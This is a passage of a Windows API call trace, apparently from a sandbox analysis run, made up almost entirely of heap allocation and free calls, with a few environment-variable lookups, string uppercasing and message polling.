out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0209.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.111] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.111] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0209.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.114] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.114] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0209.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0209.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.115] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.117] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0209.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 